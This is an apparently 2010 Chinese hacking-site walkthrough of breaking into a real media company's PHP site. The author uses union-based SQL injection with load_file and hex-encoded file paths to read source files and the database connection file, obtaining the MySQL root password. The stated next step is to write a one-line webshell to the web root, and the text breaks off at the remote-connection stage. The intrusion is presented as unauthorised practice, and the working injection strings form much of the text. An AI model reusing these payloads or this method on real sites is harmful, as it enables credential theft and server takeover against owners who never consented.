热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

php注入Root权限从入侵到提权的过程

发布时间:2010-11-07 13:50文章来源:网络文章作者:enjoyhack 点击次数:
摘要:背景: 今天下午正在搞国外网站的时候群里小寒Q我,问我对PHP的注入有没有兴趣,本人对PHP的注射经验不是很多,难得就机会练手,便答应了小寒,注入点给了我,并且还告诉我是root权限的,听到这个就更想瞧瞧了,有root的权限说不定还能提权拿服务呢 呵呵!!...

背景:

今天下午正在搞国外网站的时候群里小寒Q我,问我对PHP的注入有没有兴趣,本人对PHP的注射经验不是很多,难得就机会练手,便答应了小寒,注入点给了我,并且还告诉我是root权限的,听到这个就更想瞧瞧了,有root的权限说不定还能提权拿服务呢 呵呵!!

 

渗透开始:

    打开网站看了下,发现是个传媒公司的,然后直接用注入点load_file读取文件,直接奔MYSQL账号密码去了,既然知道是root权限了,那还是直接拿root密码,不用去爆表明找后台什么的了。因为是注入点,首先肯定是load_file当前出现注入的这个文件了,因为这个文件有执行数据库操作,必定要连接数据库的了,而我们都知道在一个网站系统中,数据库的链接都是放到一个文件中,然后在需要连接数据库进行数据库操作的页面中包含该文件即可。

 

    之前小寒已经爆出了网站的路径是D:\APMServ\APMServ5.2.6\www\htdocs\,当前注入页面为D:\APMServ\APMServ5.2.6\www\htdocs\products\prod_detil.php,转换成hex提交:/prod_detil.php?infoid=29 and 1=2 union select 1,2,3,4,5,load_file(0x443A5C41504D536572765C41504D53657276352E322E365C7777775C6874646F63735C70726F64756374735C70726F645F646574696C2E706870

页面的源码就直接爆出来了,有时候使用load_file函数读取文件时候会发现是空白,遇到这样的情况就去查看网页源代码就能看到内容了,不过现在这里只能显示部分源码,为了看到跟多的能容我用了substring函数,这个还是之前群里的handsome教我的,用法substring(load_file(hex),2,800),既是截取laod_file文件的第2个字符到800字符之间的内容,继续提交:/prod_detil.php?infoid=29 and 1=2 union select 1,2,3,4,5,substring(load_file(0x443A5C41504D536572765C41504D53657276352E322E365C7777775C6874646F63735C70726F64756374735C70726F645F646574696C2E706870 

 

这次就能看到页面前面部分的内容了,一般包含文件代码都写在页面的前面部分,所这里在页面前部分能看到包含了一个global.inc.php的文件,位于上一级目录下,既是:D:\APMServ\APMServ5.2.6\www\htdocs\global.inc.php,将其转换成hex再继续提交load:/prod_detil.php?infoid=29 and 1=2 union select 1,2,3,4,5,substring(load_file(0x443A5C41504D536572765C41504D53657276352E322E365C7777775C6874646F63735C676C6F62616C5F696E632E706870 

 

在扩大了下substring函数范围后可以看到文件中有数据库链接的注释,紧接着下面就是数据库链接文件的路径了:D:\APMServ\APMServ5.2.6\www\htdocs\admin\inc\conn.php,转换hex继续提交:/prod_detil.php?infoid=29 and 1=2 union select 1,2,3,4,5,substring(load_file(0x443A5C41504D536572765C41504D53657276352E322E365C7777775C6874646F63735C61646D696E5C696E635C636F6E6E2E706870 

 

这次就爆出了root的密码了,现在有了root的密码后就可以尝试远程连接到服务器的MYSQL数据库,然后导出一句话到网站目录下了,这个站在之前检测的时候我也尝试过直接into outfile,但是魔术转换有开启,没有成功,唯一的办法就是拿到root密码远程连接后执行导出,在mysql命令提示符中魔术转换是没用的,那个只针对网站程序来的。但是在远程连接的时候却出了问题。

标签分类: 入侵提权 渗透教程

上一篇:记录一次从入侵到提权拿下台湾某站的过程
下一篇:总结各种上传漏洞的利用方法